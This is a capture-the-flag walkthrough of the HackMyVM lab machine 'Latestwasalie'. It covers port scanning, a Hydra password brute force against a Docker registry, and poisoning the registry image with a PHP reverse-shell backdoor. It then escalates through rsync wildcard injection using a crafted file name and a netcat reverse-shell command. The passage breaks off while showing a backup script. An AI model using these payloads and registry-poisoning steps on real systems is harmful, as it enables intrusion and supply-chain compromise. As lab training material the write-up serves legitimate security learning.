HackMyVM-Latestwasalie

Come on, come on, one more drink

Go on, go on, all of you leave me


Target IP: 192.168.56.51

Difficulty: Easy (personally I'd call it Medium)

Topics covered:

Recon and enumeration: port scanning, virtual host (vhost) identification, Docker Registry API probing.

Credential brute-forcing: Hydra dictionary attack against HTTP Basic Auth.

Supply chain attack: poisoning a private image registry, pulling and pushing images with Skopeo, building a malicious image with docker commit.

Container escape: abusing a volume shared between host and container, abusing a cron job.

Wildcard injection: abusing rsync's argument parsing to achieve arbitrary command execution.

Privilege escalation: SUID abuse (touch), monitoring host processes (pspy64).


Port scan:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.51
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-17 13:55 +0000
Nmap scan report for 192.168.56.51
Host is up (0.0082s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open upnp
MAC Address: 08:00:27:6F:9C:3C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.57 seconds

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nmap -p- 192.168.56.51 -sC -sV -T4 -A
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-17 13:56 +0000
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 13:57 (0:00:08 remaining)
Nmap scan report for 192.168.56.51
Host is up (0.0034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 7+deb13u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.66 ((Debian))
|_http-title: Default site
|_http-server-header: Apache/2.4.66 (Debian)
5000/tcp open http Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
MAC Address: 08:00:27:6F:9C:3C (Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 3.37 ms 192.168.56.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.81 seconds

A Docker registry? That's unusual.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 192.168.56.51
curl: (7) Failed to connect to 192.168.56.51 port 80 after 2 ms: Could not connect to server

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 192.168.56.51
<!DOCTYPE html>
<html>
<head>
<title>Default site</title>
<meta http-equiv="Refresh" content="10; URL=http://latestwasalie.hmv/" />
</head>
<body>
<h1>Default site</h1>
<p>No application configured for this host.</p>
<p>Check the available files on this server.</p>
</body>
</html>

Add it to /etc/hosts:

192.168.56.51 latestwasalie.hmv
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl http://latestwasalie.hmv/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Latest Was A Lie</title>
<style>
:root{
--bg-1:#0b1020;
--bg-2:#131a2e;
--card:rgba(255,255,255,0.08);
--card-border:rgba(255,255,255,0.16);
--text:#eef2ff;
--muted:#a8b3cf;
--accent:#7c5cff;
--accent-2:#00d4ff;
--success:#39d98a;
--shadow:0 20px 60px rgba(0,0,0,0.35);
--radius:24px;
}

* { box-sizing: border-box; }

html, body {
margin: 0;
padding: 0;
min-height: 100%;
font-family: Inter, ui-sans-serif, system-ui, -apple-system, Segoe UI, Roboto, Helvetica, Arial, sans-serif;
color: var(--text);
background:
radial-gradient(circle at 15% 20%, rgba(124,92,255,0.22), transparent 30%),
radial-gradient(circle at 85% 30%, rgba(0,212,255,0.18), transparent 30%),
radial-gradient(circle at 50% 80%, rgba(57,217,138,0.10), transparent 25%),
linear-gradient(135deg, var(--bg-1), var(--bg-2));
overflow-x: hidden;
}

body::before,
body::after{
content:"";
position: fixed;
width: 34rem;
height: 34rem;
border-radius: 999px;
filter: blur(80px);
opacity: 0.24;
z-index: 0;
pointer-events: none;
animation: floatBlob 14s ease-in-out infinite;
}

body::before{
top: -8rem;
left: -10rem;
background: var(--accent);
}

body::after{
right: -10rem;
bottom: -10rem;
background: var(--accent-2);
animation-delay: -7s;
}

@keyframes floatBlob {
0%, 100% { transform: translate(0,0) scale(1); }
50% { transform: translate(2rem, -1rem) scale(1.08); }
}

.grid-bg{
position: fixed;
inset: 0;
background-image:
linear-gradient(rgba(255,255,255,0.03) 1px, transparent 1px),
linear-gradient(90deg, rgba(255,255,255,0.03) 1px, transparent 1px);
background-size: 40px 40px;
mask-image: radial-gradient(circle at center, black 45%, transparent 85%);
z-index: 0;
pointer-events: none;
}

.container{
position: relative;
z-index: 1;
width: min(1180px, calc(100% - 32px));
margin: 0 auto;
padding: 32px 0 48px;
}

.nav{
display:flex;
justify-content:space-between;
align-items:center;
gap:16px;
margin-bottom: 30px;
}

.brand{
display:flex;
align-items:center;
gap:14px;
font-weight:700;
letter-spacing:0.02em;
}

.brand-badge{
width:42px;
height:42px;
border-radius:14px;
background: linear-gradient(135deg, rgba(124,92,255,0.85), rgba(0,212,255,0.85));
display:grid;
place-items:center;
box-shadow: var(--shadow);
flex-shrink:0;
}

.brand-badge svg{
width:24px;
height:24px;
}

.version-chip{
display:inline-flex;
align-items:center;
gap:10px;
padding:10px 16px;
border:1px solid var(--card-border);
border-radius:999px;
background: rgba(255,255,255,0.06);
backdrop-filter: blur(10px);
color: var(--muted);
font-size: 0.95rem;
box-shadow: var(--shadow);
}

.version-dot{
width:10px;
height:10px;
border-radius:999px;
background: var(--success);
box-shadow: 0 0 18px rgba(57,217,138,0.7);
animation: pulse 2s infinite;
}

@keyframes pulse {
0%,100% { transform: scale(1); opacity: 1; }
50% { transform: scale(1.4); opacity: 0.65; }
}

.hero{
display:grid;
grid-template-columns: 1.15fr 0.85fr;
gap:24px;
align-items:stretch;
margin-bottom: 24px;
}

.panel{
border:1px solid var(--card-border);
background: var(--card);
backdrop-filter: blur(12px);
border-radius: var(--radius);
box-shadow: var(--shadow);
}

.hero-copy{
padding: 34px;
position:relative;
overflow:hidden;
}

.eyebrow{
display:inline-flex;
align-items:center;
gap:10px;
padding:8px 12px;
margin-bottom:18px;
border-radius:999px;
background: rgba(124,92,255,0.13);
border:1px solid rgba(124,92,255,0.28);
color:#d9d0ff;
font-size:0.92rem;
}

.eyebrow .spark{
width:8px;
height:8px;
border-radius:50%;
background: linear-gradient(135deg, var(--accent), var(--accent-2));
box-shadow: 0 0 18px rgba(124,92,255,0.9);
}

h1{
margin: 0 0 14px;
font-size: clamp(2.4rem, 4vw, 4.5rem);
line-height: 0.95;
letter-spacing: -0.04em;
}

.gradient-text{
background: linear-gradient(90deg, #fff, #cfc8ff 40%, #9cefff 100%);
-webkit-background-clip: text;
background-clip: text;
color: transparent;
}

.lead{
margin: 0;
max-width: 58ch;
color: var(--muted);
font-size: 1.05rem;
line-height: 1.7;
}

.hero-actions{
display:flex;
flex-wrap:wrap;
gap:12px;
margin-top:28px;
}

.btn{
display:inline-flex;
align-items:center;
gap:10px;
text-decoration:none;
color:var(--text);
padding:14px 18px;
border-radius:16px;
border:1px solid var(--card-border);
background: rgba(255,255,255,0.06);
transition: transform .2s ease, background .2s ease, border-color .2s ease;
font-weight:600;
}

.btn:hover{
transform: translateY(-2px);
background: rgba(255,255,255,0.1);
border-color: rgba(255,255,255,0.26);
}

.btn.primary{
background: linear-gradient(135deg, rgba(124,92,255,0.95), rgba(0,212,255,0.85));
border-color: transparent;
color: white;
}

.stats{
display:grid;
grid-template-columns: repeat(3, 1fr);
gap:14px;
margin-top:28px;
}

.stat{
padding:16px;
border-radius:18px;
background: rgba(255,255,255,0.04);
border:1px solid rgba(255,255,255,0.08);
}

.stat strong{
display:block;
font-size:1.15rem;
margin-bottom:4px;
}

.stat span{
color: var(--muted);
font-size:0.92rem;
}

.hero-visual{
padding: 24px;
display:grid;
place-items:center;
min-height: 440px;
position:relative;
overflow:hidden;
}

.orbital{
width:min(100%, 420px);
aspect-ratio:1/1;
position:relative;
}

.orbital svg{
width:100%;
height:100%;
display:block;
filter: drop-shadow(0 12px 32px rgba(0,0,0,0.3));
}

.cards{
display:grid;
grid-template-columns: repeat(3, 1fr);
gap:24px;
}

.card{
padding:24px;
}

.card h3{
margin:0 0 10px;
font-size:1.05rem;
}

.card p{
margin:0;
color: var(--muted);
line-height:1.7;
font-size:0.97rem;
}

.icon{
width:42px;
height:42px;
border-radius:14px;
display:grid;
place-items:center;
margin-bottom:16px;
background: linear-gradient(135deg, rgba(124,92,255,0.18), rgba(0,212,255,0.14));
border:1px solid rgba(255,255,255,0.1);
}

.footer{
margin-top: 28px;
text-align:center;
color: var(--muted);
font-size: 0.94rem;
padding: 18px 0 10px;
}

.scanline{
position:absolute;
left:0;
right:0;
height:120px;
background: linear-gradient(to bottom, transparent, rgba(255,255,255,0.08), transparent);
filter: blur(18px);
animation: scan 6s linear infinite;
opacity:.35;
}

@keyframes scan {
0% { top: -20%; }
100% { top: 120%; }
}

.tiny{
font-size:0.82rem;
color:#c8d0e8;
opacity:.78;
margin-top:10px;
}

@media (max-width: 980px){
.hero{
grid-template-columns: 1fr;
}
.cards{
grid-template-columns: 1fr;
}
}

@media (max-width: 680px){
.nav{
flex-direction:column;
align-items:flex-start;
}
.hero-copy{
padding:24px;
}
.hero-visual{
min-height: 320px;
}
.stats{
grid-template-columns:1fr;
}
}
</style>
</head>
<body>
<div class="grid-bg"></div>

<div class="container">
<div class="nav">
<div class="brand">
<div class="brand-badge" aria-hidden="true">
<svg viewBox="0 0 24 24" fill="none">
<path d="M12 3l7 4v10l-7 4-7-4V7l7-4z" stroke="white" stroke-width="1.5"/>
<path d="M8 10.5l4-2.2 4 2.2v4.2l-4 2.1-4-2.1v-4.2z" fill="white" fill-opacity="0.18" stroke="white" stroke-width="1.2"/>
</svg>
</div>
<div>
<div>LWAL Platform</div>
<div class="tiny">Enterprise infrastructure, built for scale.</div>
</div>
</div>

<div class="version-chip">
<span class="version-dot"></span>
<span>Platform release <strong>1.0</strong></span>
</div>
</div>

<section class="hero">
<div class="panel hero-copy">
<div class="scanline"></div>

<div class="eyebrow">
<span class="spark"></span>
Trusted by modern teams
</div>

<h1>
<span class="gradient-text">Build faster.</span><br>
Operate smarter.
</h1>

<p class="lead">
A unified platform for modern digital operations, helping teams deliver reliable services,
improve visibility and move with confidence.
</p>

<div class="hero-actions">
<a class="btn primary" href="#services">Explore services</a>
<a class="btn" href="#overview">Company overview</a>
</div>

<div class="stats" id="overview">
<div class="stat">
<strong>24/7</strong>
<span>Operational coverage</span>
</div>
<div class="stat">
<strong>Global</strong>
<span>Distributed infrastructure</span>
</div>
<div class="stat">
<strong>1.0</strong>
<span>Current platform release</span>
</div>
</div>
</div>

<div class="panel hero-visual" aria-hidden="true">
<div class="orbital">
<svg viewBox="0 0 500 500" fill="none" xmlns="http://www.w3.org/2000/svg">
<defs>
<linearGradient id="ring1" x1="0" y1="0" x2="500" y2="500">
<stop offset="0%" stop-color="#7C5CFF"/>
<stop offset="100%" stop-color="#00D4FF"/>
</linearGradient>
<linearGradient id="ring2" x1="500" y1="0" x2="0" y2="500">
<stop offset="0%" stop-color="#39D98A"/>
<stop offset="100%" stop-color="#7C5CFF"/>
</linearGradient>
<filter id="glow">
<feGaussianBlur stdDeviation="6" result="b"/>
<feMerge>
<feMergeNode in="b"/>
<feMergeNode in="SourceGraphic"/>
</feMerge>
</filter>
</defs>

<circle cx="250" cy="250" r="170" stroke="url(#ring1)" stroke-width="2" opacity="0.5">
<animateTransform attributeName="transform" type="rotate" from="0 250 250" to="360 250 250" dur="24s" repeatCount="indefinite"/>
</circle>

<circle cx="250" cy="250" r="120" stroke="url(#ring2)" stroke-width="2" opacity="0.45" stroke-dasharray="8 12">
<animateTransform attributeName="transform" type="rotate" from="360 250 250" to="0 250 250" dur="18s" repeatCount="indefinite"/>
</circle>

<g filter="url(#glow)">
<circle cx="250" cy="250" r="76" fill="rgba(255,255,255,0.04)" stroke="rgba(255,255,255,0.22)"/>
<path d="M250 192l48 28v60l-48 28-48-28v-60l48-28z" fill="url(#ring1)" opacity="0.9"/>
<path d="M250 212l30 17v42l-30 17-30-17v-42l30-17z" fill="#0b1020" opacity="0.75"/>
</g>

<circle r="8" fill="#00D4FF">
<animateMotion dur="10s" repeatCount="indefinite" rotate="auto">
<mpath href="#orbit-a"/>
</animateMotion>
</circle>

<circle r="6" fill="#39D98A">
<animateMotion dur="7s" repeatCount="indefinite" rotate="auto">
<mpath href="#orbit-b"/>
</animateMotion>
</circle>

<path id="orbit-a" d="M 420 250 A 170 170 0 1 1 419.9 250" fill="none"/>
<path id="orbit-b" d="M 370 250 A 120 120 0 1 0 369.9 250" fill="none"/>
</svg>
</div>
</div>
</section>

<section class="cards" id="services">
<div class="panel card">
<div class="icon">
<svg width="22" height="22" viewBox="0 0 24 24" fill="none">
<path d="M12 3l8 4.5v9L12 21l-8-4.5v-9L12 3z" stroke="white" stroke-width="1.5"/>
</svg>
</div>
<h3>Infrastructure</h3>
<p>
Resilient services designed to support high-availability workloads across modern environments.
</p>
</div>

<div class="panel card">
<div class="icon">
<svg width="22" height="22" viewBox="0 0 24 24" fill="none">
<path d="M4 12h16M12 4v16" stroke="white" stroke-width="1.5" stroke-linecap="round"/>
</svg>
</div>
<h3>Operations</h3>
<p>
Streamlined workflows that help teams maintain consistency, visibility and execution at scale.
</p>
</div>

<div class="panel card">
<div class="icon">
<svg width="22" height="22" viewBox="0 0 24 24" fill="none">
<path d="M5 12l4 4L19 6" stroke="white" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round"/>
</svg>
</div>
<h3>Delivery</h3>
<p>
Faster release cycles with a platform experience built to support growth, reliability and trust.
</p>
</div>
</section>

<div class="footer">
© 2026 LWAL Platform. All rights reserved.
</div>
</div>
</body>
</html>
<!-- Last deployment on April 6, 2026 by adm -->

At the very bottom there is a username: adm

Directory scan

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# dirsearch -u http://latestwasalie.hmv/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_latestwasalie.hmv/__26-04-17_14-01-04.txt

Target: http://latestwasalie.hmv/

[14:01:04] Starting:
[14:01:11] 403 - 322B - /.ht_wsr.txt
[14:01:11] 403 - 322B - /.htaccess_orig
[14:01:11] 403 - 322B - /.htaccess_extra
[14:01:11] 403 - 322B - /.htaccess.sample
[14:01:11] 403 - 322B - /.htaccessOLD2
[14:01:11] 403 - 322B - /.htaccessBAK
[14:01:11] 403 - 322B - /.html
[14:01:11] 403 - 322B - /.htaccess_sc
[14:01:11] 403 - 322B - /.htaccess.orig
[14:01:11] 403 - 322B - /.htaccess.bak1
[14:01:11] 403 - 322B - /.htm
[14:01:11] 403 - 322B - /.htaccessOLD
[14:01:11] 403 - 322B - /.htpasswds
[14:01:11] 403 - 322B - /.htaccess.save
[14:01:11] 403 - 322B - /.htpasswd_test
[14:01:12] 403 - 322B - /.httr-oauth
[## ] 11% 1328/11460 99/s job:1/1 errors:0Exception in thread Thread-19 (thread_proc):
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/dirsearch/lib/core/fuzzer.py", line 261, in thread_proc
self.scan(self._base_path + path, scanners)
~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/dirsearch/lib/core/fuzzer.py", line 168, in scan
response = self._requester.request(path)
File "/usr/lib/python3/dist-packages/dirsearch/lib/connection/requester.py", line 222, in request
raise RequestException(err_msg)
lib.core.exceptions.RequestException: Cannot connect to: latestwasalie.hmv

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1044, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3.13/threading.py", line 995, in run
self._target(*self._args, **self._kwargs)
~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/dirsearch/lib/core/fuzzer.py", line 268, in thread_proc
callback(e)
~~~~~~~~^^^
File "/usr/lib/python3/dist-packages/dirsearch/lib/controller/controller.py", line 482, in raise_error
raise SkipTargetInterrupt("Too many request errors")
lib.core.exceptions.SkipTargetInterrupt: Too many request errors
[## ] 12% 1404/11460 75/s job:1/1 errors:76Exception in thread Thread-35 (thread_proc):
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/dirsearch/lib/core/fuzzer.py", line 261, in thread_proc

There is something very interesting here.

The dirsearch scan breaks off halfway through. At first I thought there was rate limiting or IP-based blocking, but after switching to a different IP, adding different request headers and throttling the scan rate, the result was the same, and it even broke off earlier.

Combine that with the earlier curl connection error on port 80 and the open Docker registry port: does anything come to mind?

Think about the box name again: Latestwasalie (latest was a lie).

That's right: the whole of port 80 is a Docker container, which a background cron job keeps rebuilding, pushing and restarting.

So we can go after the source: since port 5000 serves the Docker registry, we can build a malicious image and poison it.

Let's try the username adm first.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# hydra -l adm -P /usr/share/wordlists/rockyou.txt -s 5000 -t 4 -vV 192.168.56.51 http-get /v2/_catalog
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "marie1" - 961 of 14344399 [child 2] (0/0)
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "anita" - 962 of 14344399 [child 0] (0/0)
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "lover1" - 963 of 14344399 [child 1] (0/0)
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "chicago" - 964 of 14344399 [child 3] (0/0)
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "twinkle" - 965 of 14344399 [child 2] (0/0)
[ATTEMPT] target 192.168.56.51 - login "adm" - pass "pantera" - 966 of 14344399 [child 0] (0/0)
[5000][http-get] host: 192.168.56.51 login: adm password: lover1
[STATUS] attack finished for 192.168.56.51 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-04-17 14:11:22

Got the password: lover1

Next, pull the image; the tool used here is skopeo.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# env -u http_proxy -u https_proxy -u all_proxy skopeo copy \
--src-tls-verify=false \
--src-creds=adm:lover1 \
docker://192.168.56.51:5000/latestwasalie-web:latest \
docker-daemon:latestwasalie-web:local
Getting image source signatures
Copying blob 5435b2dcdf5c done |
Copying blob 876337e68f5f done |
Copying blob 1318fd64553d done |
Copying blob 123d02a4714c done |
Copying blob 5d62a3b287ed done |
Copying blob 72997373dd6a done |
Copying blob 2b72ce02b7bc done |
Copying blob 46e3bfe285c0 done |
Copying blob 082e4b533cba done |
Copying blob 4cf495241136 done |
Copying blob 1d50649d3518 done |
Copying blob f40934428615 done |
Copying blob 4817620bffb9 done |
Copying blob 82b4191aede9 done |
Copying blob 4f4fb700ef54 done |
Copying blob 761cb6d17f6b done |
Copying blob 8a918d925f64 done |
Copying blob c2c212622156 done |
Copying blob 216dddf9cde1 done |
Copying blob 81fdb26c0284 done |
Copying blob cdc3b4e4c682 done |
Copying blob e26f4e8ab430 done |
Copying blob 7463a3667b9b done |
Copying blob ea9e4fb5131b done |
Copying config 601e268a38 done |
Writing manifest to image destination

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
latestwasalie-web local 601e268a3809 6 days ago 499MB

Add a PHP backdoor file

cat > rev.php << 'EOF'
<?php
system("php -r '\$sock=fsockopen(\"192.168.56.104\", 4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'");
?>
EOF

Inspect the web root inside a container (temp-poison) started from the pulled image

┌──(root㉿kaada)-[/tmp]
└─# docker exec temp-poison sh -c '
echo "=== 常见网站目录 ===";
ls -l /var/www /var/www/html /app /public /www /usr/share/nginx/html 2>/dev/null;
echo "=== 包含PHP文件的目录 ===";
find / -name "*.php" -type f 2>/dev/null | head -15;
'
=== 常见网站目录 ===
/var/www:
total 12
drwxr-xr-x 1 www-data www-data 4096 Apr 4 05:48 default
drwxrwxrwt 2 www-data www-data 4096 Apr 7 01:37 html
drwxr-xr-x 1 www-data www-data 4096 Apr 4 10:35 latestwasalie

/var/www/html:
total 0
=== 包含PHP文件的目录 ===
/var/www/latestwasalie/export.php
/var/www/latestwasalie/index.php
/usr/local/lib/php/test/Structures_Graph/tests/BasicGraphTest.php
/usr/local/lib/php/test/Structures_Graph/tests/AcyclicTestTest.php
/usr/local/lib/php/test/Structures_Graph/tests/TopologicalSorterTest.php
/usr/local/lib/php/test/XML_Util/tests/CreateStartElementTests.php
/usr/local/lib/php/test/XML_Util/tests/GetXmlDeclarationTests.php
/usr/local/lib/php/test/XML_Util/tests/ReplaceEntitiesTests.php
/usr/local/lib/php/test/XML_Util/tests/Bug18343Tests.php
/usr/local/lib/php/test/XML_Util/tests/CollapseEmptyTagsTests.php
/usr/local/lib/php/test/XML_Util/tests/Bug21177Tests.php
/usr/local/lib/php/test/XML_Util/tests/CreateTagTests.php
/usr/local/lib/php/test/XML_Util/tests/RaiseErrorTests.php
/usr/local/lib/php/test/XML_Util/tests/CreateCDataSectionTests.php
/usr/local/lib/php/test/XML_Util/tests/Bug5392Tests.php

Confirmed: the web root is /var/www/latestwasalie/

Poison the image and commit it

┌──(root㉿kaada)-[/tmp]
└─# docker cp backdoor.php temp-poison:/var/www/latestwasalie/backdoor.php
Successfully copied 2.56kB to temp-poison:/var/www/latestwasalie/backdoor.php

┌──(root㉿kaada)-[/tmp]
└─# docker commit temp-poison latestwasalie-web:poisoned
sha256:f680b5205f8490523b570a6a0a374719262af1edbe9ed912ee7655f42873e7fb

┌──(root㉿kaada)-[/tmp]
└─# env -u http_proxy -u https_proxy -u all_proxy skopeo copy \
--dest-tls-verify=false \
--dest-creds=adm:lover1 \
docker-daemon:latestwasalie-web:poisoned \
docker://192.168.56.51:5000/latestwasalie-web:latest
Getting image source signatures
Copying blob d3339728e686 done |
Copying blob 990167fcb4f9 done |
Copying blob 0f78731cb05b done |
Copying blob 60e70dddd9ea done |
Copying blob d59b63a13295 done |
Copying blob 23597ba15647 done |
Copying blob 2756d22f5a12 done |
Copying blob dae76f447ff7 done |
Copying blob f1994e1f158d done |
Copying blob 9a58c6adc2dc done |
Copying blob f61c35af2e8f done |
Copying blob aef25a37b2ed done |
Copying blob 613610e40207 done |
Copying blob 9b944a6755e9 done |
Copying blob 5f70bf18a086 done |
Copying blob 0f649923b77c done |
Copying blob 1f8c0f521d5c done |
Copying blob f3a194582180 done |
Copying blob 5e2ae2651790 done |
Copying blob 27d152ddda0a done |
Copying blob f0145cef6f01 done |
Copying blob 70ff88667c41 done |
Copying blob e69b40db28bf done |
Copying blob d9e8deaea142 done |
Copying blob b3e1a9d78725 done |
Copying config f680b5205f done |
Writing manifest to image destination

Start a listener on port 4444 locally and trigger the reverse shell

curl http://latestwasalie.hmv/backdoor.php
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.51] 54434

Note: because the container is refreshed very frequently, you have to work fast here, otherwise the shell drops almost immediately.

$ cd ..
$ ls /
bin
boot
data
dev
etc
home
host-bin
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

Notice the data directory.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.51] 50640
/bin/sh: 0: can't access tty; job control turned off
$ cd /data
$ ls
exports
state
$ cd ex
/bin/sh: 3: cd: can't cd to ex
$ cd exports
$ ls -al
total 28
drwxrwxrwx 2 root root 4096 Apr 10 18:08 .
drwxr-xr-x 1 root root 4096 Apr 17 14:59 ..
-rw-r--r-- 1 1000 1000 293 Apr 17 14:59 .rsync_cmd
-rw-r--r-- 1 root root 93 Apr 4 02:40 report_20260404_024041_7a6e1f.txt
-rw-r--r-- 1 root root 93 Apr 4 02:40 report_20260404_024052_3606d7.txt
-rw-r--r-- 1 root root 93 Apr 4 02:41 report_20260404_024105_d10ac5.txt
-rw-r--r-- 1 root root 93 Apr 4 02:41 report_20260404_024115_a9301d.txt
$ cat .rsync._cmd
cat: .rsync._cmd: No such file or directory
$ cat .rsync_cmd
# Comando rsync ejecutado el vie 17 abr 2026 17:00:01 CEST
rsync -e 'ssh -i /home/backupusr/.ssh/id_ed25519' -av *.txt localhost:/home/backupusr/backup/

# Usuario: backupusr
# PID: 9275
# Directorio actual: /srv/platform/appdata/exports
# Directorio destino: localhost:/home/backupusr/backup
$

An rsync script with a wildcard in the arguments: that immediately suggests wildcard injection.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.51] 60008
/bin/sh: 0: can't access tty; job control turned off
$ cd /data/exports
$ echo "bash -c 'busybox nc 192.168.56.104 5555 -e bash'" > shell.txt
$ chmod +x shell.txt
$ touch "./-e sh shell.txt"
$
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 5555
[+] Listening for reverse shells on 0.0.0.0:5555127.0.0.1192.168.21.128192.168.56.104192.168.10.150172.17.0.1172.18.0.1
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from latestwasalie-192.168.56.51-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 192.168.56.104:5555
[+] Got reverse shell from latestwasalie-192.168.56.51-Linux-x86_64 😍 Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/latestwasalie~192.168.56.51_Linux_x86_64/2026_04_17-15_09_03-918.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
backupusr@latestwasalie:/srv/platform/appdata/exports$

Write an SSH public key to get a stable foothold

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh backupusr@192.168.56.51
The authenticity of host '192.168.56.51 (192.168.56.51)' can't be established.
ED25519 key fingerprint is: SHA256:d6ezTlKBOSbEyl5V4PgjMvMtAs3DKmNzThBWmeY13lU
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.51' (ED25519) to the list of known hosts.
Linux latestwasalie 6.12.74+deb13+1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.74-2 (2026-03-08) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 4 15:38:02 2026 from 10.0.2.12

Upload pspy64

2026/04/17 17:14:01 CMD: UID=0 PID=13444 | /usr/sbin/CRON -f
2026/04/17 17:14:01 CMD: UID=0 PID=13445 | /usr/sbin/CRON -f
2026/04/17 17:14:01 CMD: UID=1000 PID=13447 | /bin/sh -c /home/backupusr/backups.sh >/dev/null 2>&1
2026/04/17 17:14:01 CMD: UID=0 PID=13446 | /usr/sbin/CRON -f
2026/04/17 17:14:01 CMD: UID=0 PID=13448 | /bin/sh -c /opt/deploy/update-latestwasalie.sh >> /var/log/latestwasalie-cron.log 2>&1
2026/04/17 17:14:01 CMD: UID=1000 PID=13449 | /bin/bash /home/backupusr/backups.sh
2026/04/17 17:14:01 CMD: UID=1000 PID=13450 | /bin/bash /home/backupusr/backups.sh
2026/04/17 17:14:01 CMD: UID=0 PID=13451 | /bin/sh -c /root/backups.sh >/dev/null 2>&1
2026/04/17 17:14:01 CMD: UID=0 PID=13452 | /bin/bash /root/backups.sh

There are many cron jobs, mostly Docker-related, but one backups.sh stands out.

backupusr@latestwasalie:~$ cat /home/backupusr/backups.sh
#!/bin/bash

# Exports backup script
# AUTHOR: Admin Backup
# DATE: 2026-04-06

SOURCE_DIR="/srv/platform/appdata/exports"
BACKUP_DIR="localhost:/home/backupusr/backup"
LOG_FILE="$SOURCE_DIR/.rsync_cmd"

# Change to the source directory
cd "$SOURCE_DIR"

# rsync command, kept only to write it into the log
RSYNC_CMD="rsync -e 'ssh -i /home/backupusr/.ssh/id_ed25519' -av *.txt $BACKUP_DIR/"

# Save the command into a fixed hidden file
cat > "$LOG_FILE" << EOF
# Comando rsync ejecutado el $(date)
$RSYNC_CMD

# Usuario: $(whoami)
# PID: $$
# Directorio actual: $(pwd)
# Directorio destino: $BACKUP_DIR
EOF

